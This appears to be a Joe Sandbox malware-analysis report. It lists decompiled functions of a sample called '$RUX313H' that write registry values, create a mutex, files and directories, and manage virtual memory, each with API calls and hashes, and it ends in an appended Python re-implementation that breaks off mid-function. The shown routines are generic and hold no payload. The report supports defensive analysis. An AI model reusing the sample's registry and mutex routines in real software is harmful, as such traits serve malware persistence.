                                                                          				// __eax = open registry key handle, __edx = value name, __ecx = string data to store
                                                                          				void* _t4;     // length of the data string
                                                                          				char* _t7;     // C string pointer to the data
                                                                          				long _t10;
                                                                          				void* _t12;
                                                                          
                                                                          				_t12 = __eax;
                                                                          				if(__eax == 0) {
                                                                          					L2:
                                                                          					return 0;   // no key handle, or RegSetValueExA failed
                                                                          				}
                                                                          				_t4 = E0040320C(__ecx);   // string length
                                                                          				_t7 = E0040340C(__ecx);   // C string pointer
                                                                          				// dwType 1 == REG_SZ; cbData = length + 1 so the terminating NUL is stored with the value
                                                                          				_t10 = RegSetValueExA(_t12, E0040340C(__edx), 0, 1, _t7, _t4 + 1); // executed
                                                                          				if(_t10 == 0) {
                                                                          					return 1;   // ERROR_SUCCESS
                                                                          				}
                                                                          				goto L2;
                                                                          			}







                                                                          Instruction addresses of the listing above: 0x00405793 - 0x004057c4

                                                                          APIs
                                                                          • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001,?,?,00000000,00407AA2,00000000,00407AC4,?,?,00000000,00000000), ref: 004057B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID:
                                                                          • API String ID: 3702945584-0
                                                                          • Opcode ID: 8fc1d0df2935156870a761a9e005f3ed3dcf16a2c3928d3d316ee70feded526d
                                                                          • Instruction ID: 82ccab74ab13a132c34841d8e2f7e51fc97cb509c9d1c97b6ea97491bda523d5
                                                                          • Opcode Fuzzy Hash: 8fc1d0df2935156870a761a9e005f3ed3dcf16a2c3928d3d316ee70feded526d
                                                                          • Instruction Fuzzy Hash: 17E04F5131061166E511256A0CC1A7B0D9D8B44A56F04043BB904EF2C3D968CD0321A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00406CA8(void* __eax, int __ecx, void* __edx) {
                                                                          				char* _t6;
                                                                          				void* _t7;
                                                                          				void* _t8;
                                                                          				void* _t11;
                                                                          				int _t16;
                                                                          
                                                                          				_t16 = __ecx;
                                                                          				_t11 = __eax;
                                                                          				E004064E4(__eax);
                                                                          				_t6 = E0040340C(__edx);
                                                                          				_t7 =  *0x40a650; // 0x400000
                                                                          				_t8 = ExtractIconA(_t7, _t6, _t16); // executed
                                                                          				if(_t8 > 1) {
                                                                          					return E00406520(_t11, _t8);
                                                                          				}
                                                                          				return _t8;
                                                                          			}

                                                                          APIs
                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000000), ref: 00406CC7
                                                                            • Part of subcall function 00406520: GetIconInfo.USER32(?), ref: 00406540
                                                                            • Part of subcall function 00406520: GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406566
                                                                            • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406574
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$DeleteIcon$CursorDestroyExtractInfo
                                                                          • String ID:
                                                                          • API String ID: 2619871307-0
                                                                          • Opcode ID: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                          • Instruction ID: 3dd68c7f1dd4f5608f9b9662a0ba171f3b5b53225b24c93893625578eb0e5390
                                                                          • Opcode Fuzzy Hash: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                                          • Instruction Fuzzy Hash: 32D05E767002202BC321B6BF2CC181B8ADDCACA269316453FB109F7293C97DCC12126D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0040575C(void* __eax, void* __ecx, void* __edx) {
                                                                          				long _t4;
                                                                          				void* _t7;
                                                                          				void** _t12;
                                                                          
                                                                          				_t7 = __eax;
                                                                          				_t4 = RegOpenKeyExA(_t7, E0040340C(__edx), 0, 0x2001f, _t12); // executed
                                                                          				if(_t4 != 0) {
                                                                          					 *_t12 = 0;
                                                                          				}
                                                                          				return  *_t12;
                                                                          			}

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,0002001F,?,?,?,?,00407A60,00000000,00407AC4,?,?,00000000,00000000,00000000), ref: 00405774
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: 069e22fb027c4afddc5b5976f6d816458c7a75ea1a42f49c021bc25e4846d371
                                                                          • Instruction ID: 3a3203429d587fd7172cf24d4e67cc15a32e0ac6e1cd073cd859d0159acdf75a
                                                                          • Opcode Fuzzy Hash: 069e22fb027c4afddc5b5976f6d816458c7a75ea1a42f49c021bc25e4846d371
                                                                          • Instruction Fuzzy Hash: 7AD05EA13046107EE210B62A5C81FBB6ACCCB487A6F00053AF948E6283D225CD0052A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404F34(void* __eax, void* __edx) {
                                                                          				char _v268;
                                                                          				long _t6;
                                                                          				void* _t13;
                                                                          				void* _t14;
                                                                          
                                                                          				_t13 = __edx;
                                                                          				_t6 = GetShortPathNameA(E0040340C(__eax),  &_v268, 0x104); // executed
                                                                          				return E00403184(_t13, _t6, _t14);
                                                                          			}

                                                                          APIs
                                                                          • GetShortPathNameA.KERNEL32(00000000,?,00000104), ref: 00404F52
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: NamePathShort
                                                                          • String ID:
                                                                          • API String ID: 1295925010-0
                                                                          • Opcode ID: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                          • Instruction ID: 14e814bc68ad69d6c3dbd45ca29a6777f0e45ac5a2bbd03733d3eefc14da3dab
                                                                          • Opcode Fuzzy Hash: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                                          • Instruction Fuzzy Hash: C9D05EE1B0021027D200B66D1CC2A9BA6CC4B88729F14413A7758EB2D2E9798E1402D9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 66%
                                                                          			E00404B68(CHAR* __eax, unsigned int __edx) {
                                                                          				CHAR* _t1;
                                                                          				void* _t2;
                                                                          				long _t6;
                                                                          				long _t9;
                                                                          
                                                                          				_t9 = __edx;
                                                                          				_t1 = __eax;
                                                                          				_push(0);
                                                                          				_t6 = __edx >> 0x00000010 & 0x00001fff;
                                                                          				if(_t6 == 0) {
                                                                          					_t6 = 0x80;
                                                                          				}
                                                                          				_t2 = CreateFileA(_t1, 0, _t9, 0, _t9, _t6, ??); // executed
                                                                          				return _t2;
                                                                          			}

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                          • Instruction ID: ecc9e2cd6cddaadd7fb33e9927afed1fcbe410aa9616ae81c498ff4a473f225f
                                                                          • Opcode Fuzzy Hash: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                                          • Instruction Fuzzy Hash: F9C012E15641113EFA0C22587C37FBB128D83D4714C90962EB206A77D1C458280041AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 68%
                                                                          			E00404018(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                                                          				void* _t8;
                                                                          
                                                                          				_t4 = _a12;
                                                                          				asm("sbb eax, eax");
                                                                          				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                                                          				return _t8;
                                                                          			}

                                                                          APIs
                                                                          • CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateMutex
                                                                          • String ID:
                                                                          • API String ID: 1964310414-0
                                                                          • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                          • Instruction ID: 31d529539147b31f913da60fb79b32c9d72b995d2910e43382fd7a33128a04fb
                                                                          • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                          • Instruction Fuzzy Hash: 8AC01273150248ABC700EEA9DC05D9B33DC5758609B008825B618D7100C139E5909B64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E00404EB0(void* __eax) {
                                                                          				int _t4;
                                                                          
                                                                          				_t4 = CreateDirectoryA(E0040340C(__eax), 0); // executed
                                                                          				asm("sbb eax, eax");
                                                                          				return _t4 + 1;
                                                                          			}

                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00404E7A,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C), ref: 00404EBD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateDirectory
                                                                          • String ID:
                                                                          • API String ID: 4241100979-0
                                                                          • Opcode ID: 386e56552f8266bde2ccc84166bcc5ed92a1d83404cd9177086d901dfc68956f
                                                                          • Instruction ID: 54881843ca4f04485c80971131db710ee83c2c1d717b1f588eca7c15a420d4f4
                                                                          • Opcode Fuzzy Hash: 386e56552f8266bde2ccc84166bcc5ed92a1d83404cd9177086d901dfc68956f
                                                                          • Instruction Fuzzy Hash: 71B092927542401AEA003ABA2CC2B2A098C974460EF10093AF206EA283D47AC9050014
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404B9C() {
                                                                          				void* _t3;
                                                                          				long _t5;
                                                                          				void* _t6;
                                                                          				void* _t10;
                                                                          
                                                                          				_t5 = GetFileAttributesA(E00404490(_t3)); // executed
                                                                          				_t6 = _t5 + 1;
                                                                          				_t10 = _t6;
                                                                          				if(_t10 != 0) {
                                                                          					return _t6 - 0x00000001 & 0 | _t10 == 0x00000000;
                                                                          				}
                                                                          				return _t6;
                                                                          			}

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 8025a4ee7f9a6a5e32ffee1429e28f2d9b7c921bde027667d06e53d93cfb3014
                                                                          • Instruction ID: b116303671e024f583cda4c1147e2dbfbac77b887c659148fe5224e5fd1b100a
                                                                          • Opcode Fuzzy Hash: 8025a4ee7f9a6a5e32ffee1429e28f2d9b7c921bde027667d06e53d93cfb3014
                                                                          • Instruction Fuzzy Hash: 65A012C682120114CC1071F1220375A0144E4C02CC38448A62350B00C2C83CE501001D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404CF8(CHAR* __eax) {
                                                                          				long _t4;
                                                                          				void* _t5;
                                                                          				void* _t9;
                                                                          
                                                                          				_t4 = GetFileAttributesA(__eax); // executed
                                                                          				_t5 = _t4 + 1;
                                                                          				_t9 = _t5;
                                                                          				if(_t9 != 0) {
                                                                          					return _t5 - 0x00000001 & 0 | _t9 != 0x00000000;
                                                                          				}
                                                                          				return _t5;
                                                                          			}

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(?,00404E3F,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C,?,0000144A), ref: 00404CF9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 1dfe280059354c2d3b00f373a1eb4cf2bc4e4ec1fc5d2a6436fb04a1a0edb6b0
                                                                          • Instruction ID: 74a4a45bf51c4893599122cbb6035ce0c32fa2704c567f2e8b32d3ffb48088ed
                                                                          • Opcode Fuzzy Hash: 1dfe280059354c2d3b00f373a1eb4cf2bc4e4ec1fc5d2a6436fb04a1a0edb6b0
                                                                          • Instruction Fuzzy Hash: 66A002C686650749DD1022E56607AAE0249FCD12D8B9D5D665391FA1C2C93CA992902E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404BB4(void* __eax, signed int __ecx, long __edx) {
                                                                          				long _t2;
                                                                          
                                                                          				_t2 = SetFilePointer(__eax, __edx, 0, __ecx & 0x000000ff); // executed
                                                                          				return _t2;
                                                                          			}

                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                          • Instruction ID: 68b303876a78b47fa373b2f01407b4ce5b79aa50a67d4c8f5d0a49418ed6adba
                                                                          • Opcode Fuzzy Hash: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                          • Instruction Fuzzy Hash: 69A002D85902203AF8182363AC5FF37105C97C0B55FD0855E7351754C164EC6A241039
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0040137C(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
                                                                          				intOrPtr _v20;
                                                                          				intOrPtr _v24;
                                                                          				void* _v28;
                                                                          				intOrPtr* _v32;
                                                                          				intOrPtr* _t24;
                                                                          				intOrPtr _t27;
                                                                          				intOrPtr _t31;
                                                                          				int _t32;
                                                                          				intOrPtr* _t35;
                                                                          				intOrPtr* _t42;
                                                                          				void* _t43;
                                                                          				void* _t44;
                                                                          				intOrPtr* _t45;
                                                                          
                                                                          				_t45 =  &_v20;
                                                                          				_v32 = __ecx;
                                                                          				 *_t45 = __edx;
                                                                          				_v28 = 0xffffffff;
                                                                          				_v24 = 0;
                                                                          				_t44 = __eax;
                                                                          				_v20 =  *_t45 + __eax;
                                                                          				_t35 =  *0x40a5d4; // 0x641e7c
                                                                          				while(_t35 != 0x40a5d4) {
                                                                          					_t42 =  *_t35;
                                                                          					_t43 =  *(_t35 + 8);
                                                                          					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
                                                                          						if(_t43 < _v28) {
                                                                          							_v28 = _t43;
                                                                          						}
                                                                          						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
                                                                          						if(_t31 > _v24) {
                                                                          							_v24 = _t31;
                                                                          						}
                                                                          						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
                                                                          						if(_t32 == 0) {
                                                                          							 *0x40a5b0 = 1;
                                                                          						}
                                                                          						E00401184(_t35);
                                                                          					}
                                                                          					_t35 = _t42;
                                                                          				}
                                                                          				_t24 = _v32;
                                                                          				 *_t24 = 0;
                                                                          				if(_v24 != 0) {
                                                                          					 *_v32 = _v28;
                                                                          					_t27 = _v24 - _v28;
                                                                          					 *((intOrPtr*)(_v32 + 4)) = _t27;
                                                                          					return _t27;
                                                                          				}
                                                                          				return _t24;
                                                                          			}

                                                                          APIs
                                                                          • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004013E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                          • Instruction ID: f327295f0dbb7d02968337953404c96d08b75f0734ec548ae522820371e35f3d
                                                                          • Opcode Fuzzy Hash: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                          • Instruction Fuzzy Hash: CB21E570608741AFD710DF19C880A5FBBE0EB85720F14C96AE8989B7A5D378E841DB5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00401434(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                          				signed int _v20;
                                                                          				void** _v24;
                                                                          				void* _t15;
                                                                          				void** _t16;
                                                                          				void* _t17;
                                                                          				signed int _t27;
                                                                          				intOrPtr* _t29;
                                                                          				void* _t31;
                                                                          				intOrPtr* _t32;
                                                                          
                                                                          				_v24 = __ecx;
                                                                          				 *_t32 = __edx;
                                                                          				_t31 = __eax & 0xfffff000;
                                                                          				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                          				 *_v24 = _t31;
                                                                          				_t15 = _v20 - _t31;
                                                                          				_v24[1] = _t15;
                                                                          				_t29 =  *0x40a5d4; // 0x641e7c
                                                                          				while(_t29 != 0x40a5d4) {
                                                                          					_t17 =  *(_t29 + 8);
                                                                          					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                                                          					if(_t31 > _t17) {
                                                                          						_t17 = _t31;
                                                                          					}
                                                                          					if(_t27 > _v20) {
                                                                          						_t27 = _v20;
                                                                          					}
                                                                          					if(_t27 > _t17) {
                                                                          						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                          						if(_t15 == 0) {
                                                                          							_t16 = _v24;
                                                                          							 *_t16 = 0;
                                                                          							return _t16;
                                                                          						}
                                                                          					}
                                                                          					_t29 =  *_t29;
                                                                          				}
                                                                          				return _t15;
                                                                          			}

                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004014A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                          • Instruction ID: 651c7d6b6741c998796b49b102b161bb2341ec2eea25b0c045f05b7ed0c0d4f4
                                                                          • Opcode Fuzzy Hash: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                          • Instruction Fuzzy Hash: E7117072A04701AFC310DF29CD80A2BB7E1EBC4750F15C63DE598673B5D638AC408795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 93%
                                                                          			E004014C8(void* __eax, void** __ecx, void* __edx) {
                                                                          				int _t7;
                                                                          				void* _t9;
                                                                          				signed int _t14;
                                                                          				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000; // round the start (eax) up to a 4 KiB page boundary
				_t22 = __eax + __edx & 0xfffff000; // round the end (eax + edx) down to a page boundary
				 *__ecx =  *_t23; // out[0] = aligned start
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7; // out[1] = aligned length
				_t19 =  *0x40a5d4; // 0x641e7c
				while(_t19 != 0x40a5d4) { // walk the block list anchored at 0x40a5d4 until it wraps back to the anchor
					_t9 =  *(_t19 + 8); // block base (+8)
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9; // block end = base + size (+0xc)
					if(_t9 <  *_t23) {
						_t9 =  *_t23; // clamp the block to the aligned window
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) { // only a non-empty overlap is released
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed; 0x4000 = MEM_DECOMMIT, pages stay reserved but lose their backing
						if(_t7 == 0) {
							 *0x40a5b0 = 2; // failure is recorded in a global status word
						}
					}
					_t19 =  *_t19; // next node
				}
				return _t7;
			}

                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,0040172F), ref: 00401522
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                          • Instruction ID: c2f9954cc8299db513f2c37eb2bc070e0fd4fafed15322d1c8bcd52f3136bf23
                                                                          • Opcode Fuzzy Hash: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                          • Instruction Fuzzy Hash: E501F7736043006FC3109E28DDC092A77A4EBC5324F15053EDA85AB3A1D73AAC0587A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
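The VirtualFree routine above is easier to check against concrete values in a readable form. The following is an added example, not code from the report or from the sample: it re-implements the page rounding, the block-list walk and the clamping in Python, with the circular list modelled as a plain list of (base, length) pairs, kernel32!VirtualFree replaced by a callback, and the sample blocks constructed here. The 0xfff/0xfffff000 masks, the +8/+0xc field offsets, the 0x4000 (MEM_DECOMMIT) flag and the status value 2 are taken from the decompile; everything else is an assumption made for the illustration.

```python
# Added example (not from the report): readable re-implementation of the
# decompiled VirtualFree routine so its clamping arithmetic can be verified.
# The block list and the VirtualFree stand-in are constructed for the demo.

PAGE_SIZE = 0x1000          # the 0xfff / 0xfffff000 masks in the decompile
MEM_DECOMMIT = 0x4000       # third argument passed to VirtualFree


def page_align_range(start, size):
    """*_t23 = (eax + 0xfff) & 0xfffff000 ; _t22 = (eax + edx) & 0xfffff000.

    Returns (aligned_start, aligned_end).  When the request covers less than
    one whole page the end can be below the start, i.e. an empty window."""
    aligned_start = (start + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)   # round up
    aligned_end = (start + size) & ~(PAGE_SIZE - 1)               # round down
    return aligned_start, aligned_end


def decommit_overlapping(start, size, blocks, virtual_free):
    """Walk every (base, length) block and decommit the part of it that falls
    inside the page-aligned window, mirroring the loop in the decompile.

    virtual_free(addr, length, flags) stands in for kernel32!VirtualFree and
    returns a truthy value on success.  Returns (out_range, calls, status):
    out_range is what the routine stores through ecx, calls lists the
    (addr, length) pairs it decommitted, status is 0 or the value 2 the
    routine writes to the global at 0x40a5b0 on failure."""
    lo, hi = page_align_range(start, size)
    out_range = (lo, hi - lo)            # *ecx = lo ; ecx[1] = hi - lo (unclamped)
    calls = []
    status = 0
    for base, length in blocks:          # node == list head ends the loop
        seg_lo = max(base, lo)           # if (base < lo) base = lo
        seg_hi = min(base + length, hi)  # if (hi < end)  end  = hi
        if seg_hi > seg_lo:              # only a non-empty overlap is released
            calls.append((seg_lo, seg_hi - seg_lo))
            if not virtual_free(seg_lo, seg_hi - seg_lo, MEM_DECOMMIT):
                status = 2               # *0x40a5b0 = 2
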